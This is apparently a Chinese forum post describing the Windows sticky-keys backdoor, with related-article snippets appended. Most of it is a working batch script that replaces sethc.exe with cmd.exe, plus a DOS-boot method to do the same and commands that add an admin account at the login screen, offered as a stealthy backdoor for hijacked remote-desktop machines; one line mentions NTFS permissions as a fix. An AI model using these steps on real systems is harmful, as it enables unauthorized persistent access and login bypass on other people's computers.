粘滞键漏洞,按5下shift后,windows就执行了system32下的sethc.exe
Windows的粘滞键。是按5下shift后,windows就执行了system32下的sethc.exe。即使
在3389中,都可以弹出!!
它本来是为不方便按组合键的人设计的。 如果我们把那个sethc.exe替换成我们想要的其它文件,比如说cmd.exe,那么就可以用cmd命令了.
其实写的批处理就可以解决了 又不麻烦
@echo off
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
我把它保存为5shift.bat。当我们运行它的时候,sethc.exe 就被换成了改了名的cmd.exe了。
可能由于cmd也是系统文件,所以替换是并没有弹出文件保护。呵呵。
个人感觉这个后门非常实用(特别是3389肉鸡!)。哪个管理员会考虑到这种后门呢
然后你就可以创建用户了
net user [UserName [Password | *] [options] [/domain]
net user [UserName {Password | *} /add [options] [/domain]
net user [UserName [/delete] [/domain]
[color=Red][b]把sethc.exe文件的NTFS权限设置一下就安全了.[/b][/color]
用shift键破解windows的登录密码.
首先用DOS盘启动.然后转到c:\windows\system32\下面.输入如下命令:
copy sethc.exe sethc2.exe 备份粘滞键文件
copy cmd.exe sethc.exe 用cmd.exe覆盖sethc.exe
然后重启.当需要输入密码的时候按5下shift就打开cmd窗口,然后输入如下密码:
net user admin admin /add 添加admin用户,密码是admin
net localgroup administrators admin /add 提升为超级管理员
分享到:
相关推荐
然而,安全漏洞往往潜藏于意想不到的地方,粘滞键也不例外。攻击者可以通过编写特定的批处理脚本(如压缩包中的"粘滞键后门.bat"),利用粘滞键功能来创建一个不易被察觉的后门。这种后门可能允许远程访问、执行任意...
标题 "一个delphi和C写的粘滞键后门" 提示了这个压缩包包含的是一个用 Delphi 和 C 语言编写的恶意软件样本,具体来说是一个利用“粘滞键”功能的后门程序。粘滞键是 Windows 操作系统中的一个辅助功能,允许用户在...
9. **粘滞键漏洞**:粘滞键漏洞(Sticky Keys)是一种旧的利用方式,通过发送特定序列的按键可以绕过用户交互,达到远程执行代码的目的。 10. **访问令牌操纵**:攻击者可能会篡改或复制访问令牌,以获得更高的权限...
在Windows系统中,按住Shift键五次会触发“粘滞键”功能,这是一个辅助功能,旨在帮助用户连续按下同一键。然而,这个功能可以被恶意利用,通过特定的命令序列,攻击者可以打开命令提示符(CMD)或者PowerShell,从而...
“shift后门”特指一种利用Windows操作系统中的辅助功能——“粘滞键”(Sticky Keys)创建后门的方法。正常情况下,当用户按下Shift键五次时,Windows会弹出一个对话框询问是否启用粘滞键。然而,通过修改特定的...
在Windows操作系统中,"sethc"是一个合法存在的辅助工具,用于在系统启动时为物理键盘损坏的用户启用粘滞键功能。然而,由于其特殊性质,"sethc"经常被黑客利用,创建带输入密码的后门,以隐蔽地控制系统。 "sethc....
这里将`explorer.exe`(Windows资源管理器)复制到`sethc.exe`的位置,`sethc.exe`是Windows中的粘滞键实用程序,通常用于辅助功能。通过替换`sethc.exe`,攻击者可以在不引起怀疑的情况下运行自定义代码。 #### ...
2893 网吧维护\资料\xp实用技巧\搞定Windows XP鲜为人知的漏洞.txt 1487 网吧维护\资料\xp实用技巧\活用XP安全模式.txt 1413 网吧维护\资料\xp实用技巧\消除WindowsXP中的复制乱码 .txt 4825 网吧维护\资料\xp实用...